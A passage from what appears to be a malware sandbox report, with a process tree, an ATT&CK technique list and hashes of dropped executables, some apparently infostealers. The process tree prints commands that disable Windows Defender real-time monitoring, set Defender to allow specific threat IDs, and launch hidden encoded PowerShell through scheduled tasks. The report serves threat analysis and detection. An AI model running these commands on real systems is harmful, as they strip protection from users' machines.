  schtasks /CREATE /TN "gkKGYmpeV" /SC once /ST 04:09:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:4508
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gkKGYmpeV"
  2⤵
  PID:2968
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5748
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gkKGYmpeV"
  2⤵
  PID:5744
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3024
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gFpRUhesK" /SC once /ST 08:20:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:2736
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gFpRUhesK"
  2⤵
  PID:1828
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gFpRUhesK"
  2⤵
  PID:5540
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
  2⤵
  PID:5756
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:4396
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
  2⤵
  PID:5644
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:5352
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:5824
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1096
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:2276
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5648
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:908
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3168
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2460
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2788
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4320
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3808
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1084
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gvxwiRAOS" /SC once /ST 01:10:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:4780
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gvxwiRAOS"
  2⤵
  PID:3988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5620
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:2668
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3204

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1340

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:3608
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5272

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
1⤵
PID:4980

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
PID:432

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
PID:4488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4172

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4660 -ip 4660
1⤵
PID:1664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:3992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3052 -ip 3052
1⤵
PID:5696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\360\Total Security\config.ini

Filesize
178B

MD5
33eef414228b89e0e4be1ab6f716c7ac

SHA1
a8866ae2ac854a8477815ccc5739d9e05e43c127

SHA256
ab9a7fb7c89788bf20d7161eaa584ddd6428abb4c1bbd7acff57bb1f3011968f

SHA512
094f98b136a1df8706453be33f5ddb6b5ef35f734f6b05dca7bbb79f29121b824b28ab6087ac4472b38c55408ab8c840ea4fbbfe2f6875fb723510f38259f996

Download Submit
C:\Program Files (x86)\360\Total Security\i18n\i18n.ini

Filesize
246B

MD5
dfc82f7a034959dac18c530c1200b62c

SHA1
9dd98389b8fd252124d7eaba9909652a1c164302

SHA256
f421332fd132d8405cad34871425c9922e4a1b172d74f86b9e4e7ee750205919

SHA512
0acb2a043303ab1c033313d62b9b4dad8ca240e345195c87776f99f129a93946036835872b336a8efd996657c37acf56da7c01d68add340408e8fce72fc66fe5

Download Submit
C:\Program Files (x86)\GameSyncLink\GameService.exe

Filesize
288KB

MD5
d9ec6f3a3b2ac7cd5eef07bd86e3efbc

SHA1
e1908caab6f938404af85a7df0f80f877a4d9ee6

SHA256
472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

SHA512
1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

Download Submit
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe

Filesize
2.5MB

MD5
e6943a08bb91fc3086394c7314be367d

SHA1
451d2e171f906fa6c43f8b901cd41b0283d1fa40

SHA256
aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

SHA512
505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

Download Submit
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe

Filesize
13.2MB

MD5
72b396a9053dff4d804e07ee1597d5e3

SHA1
5ec4fefa66771613433c17c11545c6161e1552d5

SHA256
d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d

SHA512
ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

Download Submit
C:\Program Files (x86)\GameSyncLink\installc.bat

Filesize
301B

MD5
998ab24316795f67c26aca0f1b38c8ce

SHA1
a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

SHA256
a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

SHA512
7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

Download Submit
C:\Program Files (x86)\GameSyncLink\installg.bat

Filesize
284B

MD5
5dee3cbf941c5dbe36b54690b2a3c240

SHA1
82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

SHA256
98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

SHA512
9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

Download Submit
C:\Program Files (x86)\GameSyncLink\installm.bat

Filesize
218B

MD5
94b87b86dc338b8f0c4e5869496a8a35

SHA1
2584e6496d048068f61ac72f5c08b54ad08627c3

SHA256
2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc

SHA512
b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

Download Submit
C:\Users\Admin\1000006002\c5f9bf7662.exe

Filesize
2.2MB

MD5
02e77a8dd4ec6fffdeebb3bf7e60bece

SHA1
e74f307d3607cf208bb0a2d5dbd597b8257da9a8

SHA256
d50717f0c9e356d3fdb403216daa934227da5803de425a6e42750f83dd029d3f

SHA512
f568d6233f9be9e86567072de33f29555940d3512d164b03d2359c7659b35eb1510760f17b2f28055236daab2cb24a5f39c724065dc69b80f1fe20cb6b8f85da

Download Submit
C:\Users\Admin\AppData\Local\Temp\[email protected]

Filesize
654B

MD5
5cdfc4b9de66db60219b702987b6884f

SHA1
3f664159cd6af48abc3f4c4a2d0ec16ff715b208

SHA256
9a52a5e9dcfcc59699cab7a8777c114d2b9685e68b00502c0bfb28b42ef3321d

SHA512
3c14da8a340736a697b4b2188b1b250b7328278a11e3483cc684247a2c10fc2b69435013e2704275dae319d992a048ff66a074065e91e9a2f65cfbd24a874d1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini

Filesize
830B

MD5
a483da8b27289fc9cc49d6b17e61cbf6

SHA1
2d4a5a704c2ff332df6436b7bcd16365f03c2a97

SHA256
f7785d4e80691cb2bb59301fe8962e50862c44d8992a0e308f86689b7ee76911

SHA512
e0d061a5ed7c7789d11331b192c0693e9a49398de371153d1d13a8b7a32ae7078ea103b03a535ebd0581f1d9d56bacf77b9e31f68ab1888663111e8d2afea0a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe

Filesize
2.7MB

MD5
31841361be1f3dc6c2ce7756b490bf0f

SHA1
ff2506641a401ac999f5870769f50b7326f7e4eb

SHA256
222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

SHA512
53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe

Filesize
402KB

MD5
7f981db325bfed412599b12604bd00ab

SHA1
9f8a8fd9df3af3a4111e429b639174229c0c10cd

SHA256
043839a678bed1b10be00842eae413f5ecd1cad7a0eaa384dd80bc1dcd31e69b

SHA512
a5be61416bc60669523e15213098a6d3bb5a2393612b57863fedfa1ff974bc110e0b7e8aadc97d0c9830a80798518616f9edfb65ae22334a362a743b6af3a82d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe

Filesize
1.9MB

MD5
4989aefc8b77298974d95ce814d5d259

SHA1
059a4a516f48482de3b86534b3cb64e934e17657

SHA256
fd97d0b7ab1402fa0c7ea8fc7c10ca7d018cb6410ae88f6a48a7f4df331d81d3

SHA512
d4a7bf1599c7a3a1731317ac5c293467f132e9b5c47058218a9504156c1764ed627effb9bc4e16d34d38d01ae629633e37b4eac654529a1935457a33bd1d4247

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe

Filesize
304KB

MD5
9faf597de46ed64912a01491fe550d33

SHA1
49203277926355afd49393782ae4e01802ad48af

SHA256
0854678d655668c8ebb949c990166e26a4c04aef4ecf0191a95693ca150a9715

SHA512
ef8a7a8566eaf962c4e21d49d9c1583ed2cdc9c2751ce75133a9765d2fa6dc511fc6cc99ea871eb83d50bd08a31cb0b25c03f27b8e6f351861231910a6cf1a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe

Filesize
4.2MB

MD5
0f52e5e68fe33694d488bfe7a1a71529

SHA1
11d7005bd72cb3fd46f24917bf3fc5f3203f361f

SHA256
efd29c35766c607aa15d1cb83dec625739791b1616ad37d5b47e78cdb8a42ca8

SHA512
238fbb1c04eef2f2005cb7abf0223e3cd062d9d2840966292e19dcaa495609e134a0bdc35389ae9925ecfc787a13772d3ac7b29058579f702bc849dd0343c400

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe

Filesize
1.0MB

MD5
808c0214e53b576530ee5b4592793bb0

SHA1
3fb03784f5dab1e99d5453664bd3169eff495c97

SHA256
434b1a9bd966d204eef1f4cddb7b73a91ebc5aaf4ac9b4ddd999c6444d92eb61

SHA512
2db3b4cb0233230e7c21cd820bde5de00286fbaedd3fe4dcefb6c66fe6867431f0ee1753fc18dcb89b2a18e888bd15d4d2de29b1d5cd93e425e3fcfe508c79c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe

Filesize
1.2MB

MD5
56e7d98642cfc9ec438b59022c2d58d7

SHA1
26526f702e584d8c8b629b2db5d282c2125665d7

SHA256
a2aa61942bae116f8c855fda0e9a991dba92b3a1e2f147aee0e7e2be1bdea383

SHA512
0be0b11de472029bd4e2268cddb5ddb381f7f275dfe50c47b9c836980e5cbfa7f71fe78804ef2180ee110ca9cf36944ec8b8b22babb31a1fc7a6585f79932a1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

Filesize
418KB

MD5
0099a99f5ffb3c3ae78af0084136fab3

SHA1
0205a065728a9ec1133e8a372b1e3864df776e8c

SHA256
919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

SHA512
5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe

Filesize
749KB

MD5
ec071dde7d9bec968e6765d245824a66

SHA1
06f82c9e241ba768a43009925a5b081f8f955932

SHA256
21aaa33d1cd4d9f0de4f60a35c4694ba926e7e01118a8c14b2fd8856a71774c9

SHA512
cd87e5a07480c84ef9cf3dfd5feeb81506d1ecce49b17c6587cb3163ab2d9d3cc8ac1ebfbbb5b08cef7a74f07ead2bb6fa1bccb290fe1b31ce7dd8d1751325e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe

Filesize
284KB

MD5
